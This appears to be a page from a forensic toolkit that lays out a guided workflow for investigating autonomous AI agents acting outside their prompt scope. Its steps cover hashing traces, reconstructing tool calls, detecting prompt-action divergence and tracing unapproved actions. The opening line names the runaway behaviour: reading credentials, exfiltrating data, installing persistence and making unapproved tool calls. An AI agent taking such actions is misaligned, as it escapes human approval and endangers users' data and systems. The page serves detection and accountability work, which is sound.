AI agent runaway action
an autonomous agent (Claude · GPT · Gemini · Copilot · custom MCP) takes actions outside its prompt scope — reads credentials it shouldn't, exfils data, installs persistence, calls an MCP tool a human wouldn't have approved. evidence is the tool-call trace, the prompt-action divergence, and the OAuth grant ledger — not the prompt itself. distinct from llm-prompt-injection (malicious input) and insider-threat (human actor).
a guided path, not automation — each step opens a tool you run yourself; nothing uploads. progress is saved only in this browser.
wraps the AI agent runaway — trace + divergence kit preset — drop tool-call traces + prompt logs → reconstruct execution → divergence detect → accountability → report
guided steps
- evidence manifest generator
hash agent trace + prompt logs before reconstruction
- ai agent tool call execution trace reconstructor
reconstruct full tool-call execution sequence from agent logs
- ai agent prompt vs action divergence detector
flag actions outside approved prompt scope
- ai agent autonomous action accountability tracer
trace which autonomous actions lacked human approval
- mcp tool call graph reconstructor
build MCP tool-call graph showing scope creep paths
- case report generator
draft report linking prompt-action divergence to unauthorized tool calls
suggested options · title: AI agent runaway — trace + divergence
when you're done
export a run summary — a small JSON record of which steps you marked done, your notes, and a self-hash so the record can't be silently altered. it is your reproducibility note, not a per-tool receipt: each tool emits its own input→output receipt when you run it.